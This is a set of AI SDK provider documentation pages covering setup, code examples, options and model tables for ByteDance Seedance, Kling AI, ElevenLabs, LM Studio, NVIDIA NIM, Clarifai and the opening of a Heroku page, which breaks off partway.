Seedance 2.0 supports reference audio that is used as background music or sound for the generated video:
import {
byteDance,
type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: byteDance.video('dreamina-seedance-2-0-260128'),
prompt:
'A serene mountain landscape at sunrise with gentle camera movement',
aspectRatio: '16:9',
duration: 4,
providerOptions: {
bytedance: {
referenceAudio: ['https://example.com/background-music.mp3'],
generateAudio: true,
watermark: false,
} satisfies ByteDanceVideoProviderOptions,
},
});
Video Provider Options
The following provider options are available via providerOptions.bytedance:
Generation Options
- `watermark` *boolean*: Whether to add a watermark to the generated video.
- `generateAudio` *boolean*: Whether to generate synchronized audio for the video. Only supported by Seedance 1.5 Pro.
- `cameraFixed` *boolean*: Whether to fix the camera during generation.
- `returnLastFrame` *boolean*: Whether to return the last frame of the generated video. Useful for chaining consecutive videos.
- `serviceTier` *'default' | 'flex'*: Inference tier. `'default'` for online inference. `'flex'` for offline inference at 50% of the price, with higher latency (response times on the order of hours).
- `draft` *boolean*: Enable draft sample mode for low-cost preview generation. Only supported by Seedance 1.5 Pro. Generates a 480p preview video for rapid iteration before committing to a full-quality generation. See the sketch after this list.
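For example, a minimal sketch of generating a cheap draft preview with the draft option (the prompt is illustrative):

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

// Generate a low-cost 480p draft first; once the prompt is dialed in,
// re-run the same call without `draft` for the full-quality video.
const { video } = await generateVideo({
  model: byteDance.video('seedance-1-5-pro-251215'),
  prompt: 'A paper boat drifting down a rain-soaked street',
  duration: 5,
  providerOptions: {
    bytedance: {
      draft: true,
    } satisfies ByteDanceVideoProviderOptions,
  },
});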
Image Input Options
- `lastFrameImage` *string*: URL of the last frame image for first-and-last frame video generation. The model generates a smooth transition between the first frame (provided via the `image` prompt) and this last frame. Supported by Seedance 1.5 Pro, 1.0 Pro, and 1.0 Lite I2V.
- `referenceImages` *string[]*: Array of reference image URLs (1-4 images) for multi-reference image-to-video generation. The model extracts key features from each image and reproduces them in the video. Use `[Image 1]`, `[Image 2]`, etc. in your prompt to reference specific images. Supported by Seedance 1.0 Lite I2V.
Media Reference Options
- `referenceVideos` *string[]*: Array of reference video URLs (up to 3 videos, max 15 seconds each) for reference-guided video generation. The model uses the referenced videos to guide style, motion, or composition. Supported by Seedance 2.0.
- `referenceAudio` *string[]*: Array of reference audio URLs (up to 3, max 15 seconds each) for audio-guided video generation. The model uses the referenced audio as background music or synchronized sound. Supports data URIs (e.g., `data:audio/wav;base64,...`). Supported by Seedance 2.0.
Polling Options
- `pollIntervalMs` *number*: How frequently the API is checked for completed videos while they are being processed. Defaults to 3000ms.
- `pollTimeoutMs` *number*: Maximum time to wait for video generation to complete before timing out. Defaults to 300000ms (5 minutes). A sketch overriding both polling defaults follows this list.
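A minimal sketch of overriding both polling defaults, e.g. for a longer-running generation (the prompt and values are illustrative):

import {
  byteDance,
  type ByteDanceVideoProviderOptions,
} from '@ai-sdk/bytedance';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: byteDance.video('seedance-1-0-pro-250528'),
  prompt: 'A time-lapse of clouds rolling over a mountain ridge',
  duration: 10,
  providerOptions: {
    bytedance: {
      pollIntervalMs: 5000, // check every 5 seconds
      pollTimeoutMs: 600000, // give up after 10 minutes
    } satisfies ByteDanceVideoProviderOptions,
  },
});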
Video Model Capabilities
| Model | Model ID | Capabilities |
| --- | --- | --- |
| Seedance 2.0 | `dreamina-seedance-2-0-260128` | T2V, I2V, reference videos (up to 3), reference audio (up to 3), audio-video sync. Duration: 4-15s. Resolution: 480p, 720p. |
| Seedance 2.0 Fast | `dreamina-seedance-2-0-fast-260128` | T2V, I2V, reference videos (up to 3), reference audio (up to 3), audio-video sync. Optimized for speed. Duration: 4-15s. Resolution: 480p, 720p. |
| Seedance 1.5 Pro | `seedance-1-5-pro-251215` | T2V, I2V (first frame), I2V (first+last frame), audio-video sync, draft mode. Duration: 4-12s. Resolution: 480p, 720p, 1080p. |
| Seedance 1.0 Pro | `seedance-1-0-pro-250528` | T2V, I2V (first frame), I2V (first+last frame). Duration: 2-12s. Resolution: 480p, 720p, 1080p. |
| Seedance 1.0 Pro Fast | `seedance-1-0-pro-fast-251015` | T2V, I2V (first frame). Optimized for speed and cost. Duration: 2-12s. |
| Seedance 1.0 Lite (T2V) | `seedance-1-0-lite-t2v-250428` | Text-to-video only. Duration: 2-12s. Resolution: 480p, 720p, 1080p. |
| Seedance 1.0 Lite (I2V) | `seedance-1-0-lite-i2v-250428` | I2V (first frame), I2V (first+last frame), multi-reference images (1-4). Duration: 2-12s. Resolution: 480p, 720p. |
Supported aspect ratios: 16:9, 4:3, 1:1, 3:4, 9:16, 21:9, adaptive (image-to-video only).
All models output MP4 video at 24 fps.
title: Kling AI
description: Learn how to use the Kling AI provider for the AI SDK.
Kling AI Provider
The Kling AI provider contains support for Kling AI's video generation models, including text-to-video, image-to-video, motion control, and multi-shot video generation.
Setup
The Kling AI provider is available in the @ai-sdk/klingai module. You can install it with
pnpm add @ai-sdk/klingai
Provider Instance
You can import the default provider instance klingai from @ai-sdk/klingai:
import { klingai } from '@ai-sdk/klingai';
If you need a customized setup, you can import createKlingAI from @ai-sdk/klingai and create a provider instance with your settings:
import { createKlingAI } from '@ai-sdk/klingai';
const klingai = createKlingAI({
accessKey: 'your-access-key',
secretKey: 'your-secret-key',
});
You can use the following optional settings to customize the Kling AI provider instance:
- `accessKey` *string*: Kling AI access key. Defaults to the `KLINGAI_ACCESS_KEY` environment variable.
- `secretKey` *string*: Kling AI secret key. Defaults to the `KLINGAI_SECRET_KEY` environment variable.
- `baseURL` *string*: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://api-singapore.klingai.com`.
- `headers` *Record<string,string>*: Custom headers to include in the requests.
- `fetch` *(input: RequestInfo, init?: RequestInit) => Promise<Response>*: Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Video Models
You can create Kling AI video models using the .video() factory method.
For more on video generation with the AI SDK see generateVideo().
This provider currently supports three video generation modes: text-to-video, image-to-video, and motion control.
Text-to-Video
Generate videos from text prompts:
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { videos } = await generateVideo({
model: klingai.video('kling-v2.6-t2v'),
prompt: 'A chicken flying into the sunset in the style of 90s anime.',
aspectRatio: '16:9',
duration: 5,
providerOptions: {
klingai: {
mode: 'std',
} satisfies KlingAIVideoModelOptions,
},
});
Image-to-Video
Generate videos from a start frame image with an optional text prompt. The popular start+end frame feature is available via the imageTail option:
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { videos } = await generateVideo({
model: klingai.video('kling-v2.6-i2v'),
prompt: {
image: 'https://example.com/start-frame.png',
text: 'The cat slowly turns its head and blinks',
},
duration: 5,
providerOptions: {
klingai: {
// Pro mode required for start+end frame control
mode: 'pro',
// Optional: end frame image
imageTail: 'https://example.com/end-frame.png',
} satisfies KlingAIVideoModelOptions,
},
});
Multi-Shot Video Generation
Generate videos with multiple storyboard shots, each with its own prompt and duration (Kling v3.0+):
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { videos } = await generateVideo({
model: klingai.video('kling-v3.0-t2v'),
prompt: '', // per-shot prompts are supplied via multiPrompt below
aspectRatio: '16:9',
duration: 10,
providerOptions: {
klingai: {
mode: 'pro',
multiShot: true,
shotType: 'customize',
multiPrompt: [
{
index: 1,
prompt: 'A sunrise over a calm ocean, warm golden light.',
duration: '4',
},
{
index: 2,
prompt: 'A flock of seagulls take flight from the beach.',
duration: '3',
},
{
index: 3,
prompt: 'Waves crash against rocky cliffs at sunset.',
duration: '3',
},
],
sound: 'on',
} satisfies KlingAIVideoModelOptions,
},
});
Multi-shot also works with image-to-video by combining a start frame image with per-shot prompts.
Motion Control
Generate video by transferring motion from a reference video to a character image:
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';
const { videos } = await generateVideo({
model: klingai.video('kling-v3.0-motion-control'),
prompt: {
image: 'https://example.com/character.png',
text: 'The character performs a smooth dance move',
},
providerOptions: {
klingai: {
videoUrl: 'https://example.com/reference-motion.mp4',
characterOrientation: 'image',
mode: 'std',
// Optional: reference element from element library (v3.0+, max 1)
elementList: [{ element_id: 829836802793406551 }],
} satisfies KlingAIVideoModelOptions,
},
});
Video Provider Options
The following provider options are available via providerOptions.klingai. Options vary by mode; see the KlingAI Capability Map for per-model support.
Common Options
- `mode` *'std' | 'pro'*: Video generation mode. `'std'` is cost-effective; `'pro'` produces higher quality but takes longer.
- `pollIntervalMs` *number*: Polling interval in milliseconds for checking task status. Defaults to 5000.
- `pollTimeoutMs` *number*: Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
- `watermarkEnabled` *boolean*: Whether to generate watermarked results simultaneously.
Text-to-Video and Image-to-Video Options
- `negativePrompt` *string*: A description of what to avoid in the generated video (max 2500 characters).
- `sound` *'on' | 'off'*: Whether to generate audio simultaneously. Only supported by V2.6 and later models, and requires `mode: 'pro'`.
- `cfgScale` *number*: Flexibility in video generation. Higher values mean stronger prompt adherence. Range: [0, 1]. Not supported by V2.x models.
- `cameraControl` *object*: Camera movement control with a `type` preset (`'simple'`, `'down_back'`, `'forward_up'`, `'right_turn_forward'`, `'left_turn_forward'`) and an optional `config` with `horizontal`, `vertical`, `pan`, `tilt`, `roll`, and `zoom` values (range: [-10, 10]). See the sketch after this list.
- `multiShot` *boolean*: Enable multi-shot video generation (Kling v3.0+). When true, the video is split into up to 6 storyboard shots with individual prompts and durations.
- `shotType` *'customize' | 'intelligence'*: Storyboard method for multi-shot generation. `'customize'` uses `multiPrompt` for user-defined shots. `'intelligence'` lets the model auto-segment based on the main prompt. Required when `multiShot` is true.
- `multiPrompt` *Array<{index, prompt, duration}>*: Per-shot details for multi-shot generation. Each shot has an `index` (number), `prompt` (string, max 512 characters), and `duration` (string, in seconds). Shot durations must sum to the total duration. Required when `multiShot` is true and `shotType` is `'customize'`.
- `voiceList` *Array<{voice_id: string}>*: Voice references for voice control (Kling v3.0+). Up to 2 voices. Reference them via the `<<<voice_1>>>` template syntax in the prompt. Requires `sound: 'on'`. Cannot coexist with `elementList` on the I2V endpoint.
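For example, a minimal sketch of the cameraControl option with the `'simple'` preset (the prompt and axis values are illustrative; leaving all axes except one at 0 follows common usage of the simple preset, which is an assumption):

import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v1-t2v'), // camera control is supported in std mode on V1
  prompt: 'A lighthouse on a cliff at dawn',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    klingai: {
      mode: 'std',
      cameraControl: {
        type: 'simple',
        // illustrative: slow zoom in, all other axes left at 0
        config: { horizontal: 0, vertical: 0, pan: 0, tilt: 0, roll: 0, zoom: 5 },
      },
    } satisfies KlingAIVideoModelOptions,
  },
});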
Image-to-Video Only Options
- `imageTail` *string*: End frame image for start+end frame control. Accepts an image URL or raw base64-encoded data. Requires `mode: 'pro'` for most models.
- `staticMask` *string*: Static brush mask image for motion brush. Accepts an image URL or raw base64-encoded data.
- `dynamicMasks` *Array*: Dynamic brush configurations for motion brush. Up to 6 groups, each with a `mask` (image URL or base64) and `trajectories` (array of `{x, y}` coordinates).
Image-to-Video and Motion Control Options
- `elementList` *Array<{element_id: number}>*: Reference elements for element control (Kling v3.0+). Supports video character elements and multi-image elements. Up to 3 elements for I2V (cannot coexist with `voiceList`). Up to 1 element for motion control.
Motion Control Only Options
- `videoUrl` *string* (required): URL of the reference motion video. Supports .mp4/.mov, max 100MB, duration 3–30 seconds.
- `characterOrientation` *'image' | 'video'* (required): Orientation of the characters in the generated video. `'image'` matches the reference image orientation (max 10s video). `'video'` matches the reference video orientation (max 30s video).
- `keepOriginalSound` *'yes' | 'no'*: Whether to keep the original sound from the reference video. Defaults to `'yes'`.
Video Model Capabilities
Text-to-Video
| Model | Description |
| --- | --- |
| `kling-v3.0-t2v` | Latest v3.0, multi-shot, voice control, sound (3-15s) |
| `kling-v2.6-t2v` | V2.6, sound in pro mode |
| `kling-v2.5-turbo-t2v` | Optimized for speed, std and pro |
| `kling-v2.1-master-t2v` | High-quality generation, pro only |
| `kling-v2-master-t2v` | Master-quality generation |
| `kling-v1.6-t2v` | V1.6 generation, std and pro |
| `kling-v1-t2v` | Original V1 model, supports camera control (std) |
Image-to-Video
| Model | Description |
| --- | --- |
| `kling-v3.0-i2v` | Latest v3.0, multi-shot, element/voice control, sound (3-15s) |
| `kling-v2.6-i2v` | V2.6, sound and end-frame in pro mode |
| `kling-v2.5-turbo-i2v` | Optimized for speed, end-frame in pro |
| `kling-v2.1-master-i2v` | High-quality generation, pro only |
| `kling-v2.1-i2v` | V2.1 generation, end-frame in pro |
| `kling-v2-master-i2v` | Master-quality generation |
| `kling-v1.6-i2v` | V1.6 generation, end-frame in pro |
| `kling-v1.5-i2v` | V1.5 generation, end-frame and motion brush in pro |
| `kling-v1-i2v` | Original V1 model, end-frame and motion brush in std/pro |
Motion Control
| Model | Description |
| --- | --- |
| `kling-v3.0-motion-control` | Latest v3.0, enhanced facial consistency via element binding |
| `kling-v2.6-motion-control` | Transfers motion from a reference video to a character image |
title: ElevenLabs
description: Learn how to use the ElevenLabs provider for the AI SDK.
ElevenLabs Provider
The ElevenLabs provider contains model support for the ElevenLabs transcription and speech generation APIs.
Setup
The ElevenLabs provider is available in the @ai-sdk/elevenlabs module. You can install it with
pnpm add @ai-sdk/elevenlabs
Provider Instance
You can import the default provider instance elevenlabs from @ai-sdk/elevenlabs:
import { elevenlabs } from '@ai-sdk/elevenlabs';
If you need a customized setup, you can import createElevenLabs from @ai-sdk/elevenlabs and create a provider instance with your settings:
import { createElevenLabs } from '@ai-sdk/elevenlabs';
const elevenlabs = createElevenLabs({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the ElevenLabs provider instance:
- `apiKey` *string*: API key that is sent using the `Authorization` header. It defaults to the `ELEVENLABS_API_KEY` environment variable.
- `headers` *Record<string,string>*: Custom headers to include in the requests.
- `fetch` *(input: RequestInfo, init?: RequestInit) => Promise<Response>*: Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the ElevenLabs speech API
using the .speech() factory method.
The first argument is the model id e.g. eleven_multilingual_v2.
const model = elevenlabs.speech('eleven_multilingual_v2');
The voice argument can be set to a voice ID from the ElevenLabs Voice Library.
You can find voice IDs by selecting a voice in the library and copying its ID.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';
const result = await generateSpeech({
model: elevenlabs.speech('eleven_multilingual_v2'),
text: 'Hello, world!',
voice: '21m00Tcm4TlvDq8ikWAM', // Rachel voice
});
You can also pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import {
elevenlabs,
type ElevenLabsSpeechModelOptions,
} from '@ai-sdk/elevenlabs';
const result = await generateSpeech({
model: elevenlabs.speech('eleven_multilingual_v2'),
text: 'Hello, world!',
voice: '21m00Tcm4TlvDq8ikWAM',
providerOptions: {
elevenlabs: {
voiceSettings: {
stability: 0.5,
similarityBoost: 0.75,
},
} satisfies ElevenLabsSpeechModelOptions,
},
});
The following provider options are available:

- `languageCode` *string or null*: Optional. Language code (ISO 639-1) used to enforce a language for the model. Currently, only Turbo v2.5 and Flash v2.5 support language enforcement. For other models, providing a language code will result in an error.
- `voiceSettings` *object or null*: Optional. Voice settings that override stored settings for the given voice. These are applied only to the current request.
  - `stability` *double or null*: Optional. Determines how stable the voice is and the randomness between each generation. Lower values introduce a broader emotional range; higher values result in a more monotonous voice.
  - `useSpeakerBoost` *boolean or null*: Optional. Boosts similarity to the original speaker. Increases computational load and latency.
  - `similarityBoost` *double or null*: Optional. Controls how closely the AI should adhere to the original voice.
  - `style` *double or null*: Optional. Amplifies the style of the original speaker. May increase latency if set above 0.
- `pronunciationDictionaryLocators` *array of objects or null*: Optional. A list of pronunciation dictionary locators to apply to the text, in order. Up to 3 locators per request. Each locator object contains:
  - `pronunciationDictionaryId` *string* (required): The ID of the pronunciation dictionary.
  - `versionId` *string or null* (optional): The version ID of the dictionary. If not provided, the latest version is used.
- `seed` *integer or null*: Optional. If specified, the system will attempt to sample deterministically. Must be between 0 and 4294967295. Determinism is not guaranteed.
- `previousText` *string or null*: Optional. The text that came before the current request's text. Can improve continuity when concatenating generations or influence the continuity of the current generation (see the sketch after this list).
- `nextText` *string or null*: Optional. The text that comes after the current request's text. Can improve continuity when concatenating generations or influence the continuity of the current generation.
- `previousRequestIds` *array of strings or null*: Optional. List of request IDs for samples generated before this one. Improves continuity when splitting a large task. Max 3 IDs. If both `previousText` and `previousRequestIds` are sent, `previousText` is ignored.
- `nextRequestIds` *array of strings or null*: Optional. List of request IDs for samples generated after this one. Useful for maintaining continuity when regenerating a sample. Max 3 IDs. If both `nextText` and `nextRequestIds` are sent, `nextText` is ignored.
- `applyTextNormalization` *enum*: Optional. Controls text normalization. Allowed values: `'auto'` (default), `'on'`, `'off'`. `'auto'`: the system decides whether to apply normalization (e.g., spelling out numbers). `'on'`: always apply normalization. `'off'`: never apply normalization. For `eleven_turbo_v2_5` and `eleven_flash_v2_5`, normalization can only be enabled with Enterprise plans.
- `applyLanguageTextNormalization` *boolean*: Optional. Defaults to `false`. Controls language text normalization, which helps with proper pronunciation in some supported languages (currently only Japanese). May significantly increase latency.
- `enableLogging` *boolean*: Optional. Whether to enable request logging for this API call. Defaults to the account-level setting.
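For example, a minimal sketch of preserving delivery across a passage that is split into multiple requests, using the previousText and nextText options above (the sentences are illustrative):

import { experimental_generateSpeech as generateSpeech } from 'ai';
import {
  elevenlabs,
  type ElevenLabsSpeechModelOptions,
} from '@ai-sdk/elevenlabs';

const result = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: 'This is the second sentence of a longer passage.',
  voice: '21m00Tcm4TlvDq8ikWAM',
  providerOptions: {
    elevenlabs: {
      // the surrounding text helps the model keep a consistent delivery
      previousText: 'This is the first sentence of a longer passage.',
      nextText: 'This is the third sentence of a longer passage.',
    } satisfies ElevenLabsSpeechModelOptions,
  },
});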
Model Capabilities
The following speech model IDs are available: `eleven_v3`, `eleven_multilingual_v2`, `eleven_flash_v2_5`, `eleven_flash_v2`, `eleven_turbo_v2_5`, `eleven_turbo_v2`, `eleven_monolingual_v1`, and `eleven_multilingual_v1`.
Transcription Models
You can create models that call the ElevenLabs transcription API
using the .transcription() factory method.
The first argument is the model id e.g. scribe_v1.
const model = elevenlabs.transcription('scribe_v1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.
import { experimental_transcribe as transcribe } from 'ai';
import {
elevenlabs,
type ElevenLabsTranscriptionModelOptions,
} from '@ai-sdk/elevenlabs';
const result = await transcribe({
model: elevenlabs.transcription('scribe_v1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: {
elevenlabs: {
languageCode: 'en',
} satisfies ElevenLabsTranscriptionModelOptions,
},
});
The following provider options are available:
- `languageCode` *string*: An ISO-639-1 or ISO-639-3 language code corresponding to the language of the audio file. Can sometimes improve transcription performance if known beforehand. Defaults to `null`, in which case the language is predicted automatically.
- `tagAudioEvents` *boolean*: Whether to tag audio events like (laughter), (footsteps), etc. in the transcription. Defaults to `true`.
- `numSpeakers` *integer*: The maximum number of speakers talking in the uploaded file. Can help with predicting who speaks when. At most 32 speakers can be predicted. Defaults to `null`, in which case the number of speakers is set to the maximum the model supports.
- `timestampsGranularity` *enum*: The granularity of the timestamps in the transcription. Defaults to `'word'`. Allowed values: `'none'`, `'word'`, `'character'`.
- `diarize` *boolean*: Whether to annotate which speaker is currently talking in the uploaded file. Defaults to `true`. See the sketch after this list.
- `fileFormat` *enum*: The format of the input audio. Defaults to `'other'`. Allowed values: `'pcm_s16le_16'`, `'other'`. For `'pcm_s16le_16'`, the input audio must be 16-bit PCM at a 16kHz sample rate, single channel (mono), and little-endian byte order. Latency is lower than with an encoded waveform.
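For example, a minimal sketch of a diarized two-speaker transcription with word-level timestamps (the audio file path is illustrative):

import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'node:fs/promises';
import {
  elevenlabs,
  type ElevenLabsTranscriptionModelOptions,
} from '@ai-sdk/elevenlabs';

const result = await transcribe({
  model: elevenlabs.transcription('scribe_v1'),
  audio: await readFile('./two-speaker-call.mp3'),
  providerOptions: {
    elevenlabs: {
      diarize: true, // annotate which speaker is talking
      numSpeakers: 2,
      timestampsGranularity: 'word',
    } satisfies ElevenLabsTranscriptionModelOptions,
  },
});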
Model Capabilities
The available transcription model IDs are `scribe_v1` and `scribe_v1_experimental`.
title: LM Studio
description: Use the LM Studio OpenAI compatible API with the AI SDK.
LM Studio Provider
LM Studio is a user interface for running local models.
It contains an OpenAI compatible API server that you can use with the AI SDK. You can start the local server under the Local Server tab in the LM Studio UI ("Start Server" button).
Setup
The LM Studio provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use LM Studio, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
Language Models
You can interact with local LLMs in LM Studio using a provider instance.
The first argument is the model id, e.g. llama-3.2-1b.
const model = lmstudio('llama-3.2-1b');
To be able to use a model, you need to download it first.
Example
You can use LM Studio language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
const { text } = await generateText({
model: lmstudio('llama-3.2-1b'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
maxRetries: 1, // immediately error if the server is not running
});
LM Studio language models can also be used with streamText.
Embedding Models
You can create models that call the LM Studio embeddings API
using the .embeddingModel() factory method.
const model = lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5');
Example - Embedding a Single Value
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
model: lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5'),
value: 'sunny day at the beach',
});
Example - Embedding Many Values
When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).
The AI SDK provides the embedMany function for this purpose.
Similar to embed, you can use it with embeddings models,
e.g. lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5') or lmstudio.embeddingModel('text-embedding-bge-small-en-v1.5').
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embedMany } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
model: lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5'),
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
title: NVIDIA NIM
description: Use NVIDIA NIM OpenAI compatible API with the AI SDK.
NVIDIA NIM Provider
NVIDIA NIM provides optimized inference microservices for deploying foundation models. It offers an OpenAI-compatible API that you can use with the AI SDK.
Setup
The NVIDIA NIM provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use NVIDIA NIM, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
Language Models
You can interact with NIM models using a provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:
const model = nim.chatModel('deepseek-ai/deepseek-r1');
Example - Generate Text
You can use NIM language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
const { text, usage, finishReason } = await generateText({
model: nim.chatModel('deepseek-ai/deepseek-r1'),
prompt: 'Tell me the history of the San Francisco Mission-style burrito.',
});
console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);
Example - Stream Text
NIM language models can also generate text in a streaming fashion with the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
const result = streamText({
model: nim.chatModel('deepseek-ai/deepseek-r1'),
prompt: 'Tell me the history of the Northern White Rhino.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log();
console.log('Token usage:', await result.usage);
console.log('Finish reason:', await result.finishReason);
NIM language models also support structured data generation with Output.
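A minimal sketch of structured output generation, assuming the experimental Output.object API from the ai package and an illustrative zod schema:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const { experimental_output } = await generateText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Summarize the Golden Gate Bridge as structured data.',
  // constrain the result to the given schema
  experimental_output: Output.object({
    schema: z.object({
      name: z.string(),
      spanMeters: z.number(),
      opened: z.string(),
    }),
  }),
});

console.log(experimental_output);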
title: Clarifai
description: Use Clarifai OpenAI compatible API with the AI SDK.
Clarifai Provider
Clarifai is a platform for building, deploying, and scaling AI-powered applications. It provides a suite of tools and APIs for computer vision, natural language processing, and generative AI. Clarifai offers an OpenAI-compatible API through its full-stack AI development platform, making it easy to integrate powerful AI capabilities using the AI SDK.
Setup
The Clarifai provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use Clarifai, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
New users can sign up for a free account on Clarifai to get started.
Language Models
You can interact with various large language models (LLMs) available on Clarifai using the provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
Example - Generate Text
You can use Clarifai language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
const { text, usage, finishReason } = await generateText({
model,
prompt: 'What is photosynthesis?',
});
console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);
Example - Streaming Text
You can also stream text responses from Clarifai models using the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
const result = streamText({
model,
prompt: 'What is photosynthesis?',
});
for await (const message of result.textStream) {
console.log(message);
}
For a full list of available models, refer to the Clarifai Model Gallery.
title: Heroku
description: Use a Heroku OpenAI compatible API with the AI SDK.
Heroku Provider
Heroku is a cloud platform for deploying and running applications, including AI models. You can deploy OpenAI API compatible models on Heroku and use them with the AI SDK.
Setup
The Heroku provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with
pnpm add @ai-sdk/openai-compatible
Heroku Setup
- Create a test app in Heroku:
heroku create
- Provision the claude-3-5-haiku model for inference:
heroku ai:models:create -a $APP_NAME claude-3-5-haiku
- Export the config variables:
export INFERENCE_KEY=$(heroku config:get INFERENCE_KEY -a $APP_NAME)
export INFERENCE_MODEL_ID=$(heroku config:get INFERENCE_MODEL_ID -a $APP_NAME)
export INFERENCE_URL=$(heroku config:get INFERENCE_URL -a $APP_NAME)
Provider Instance
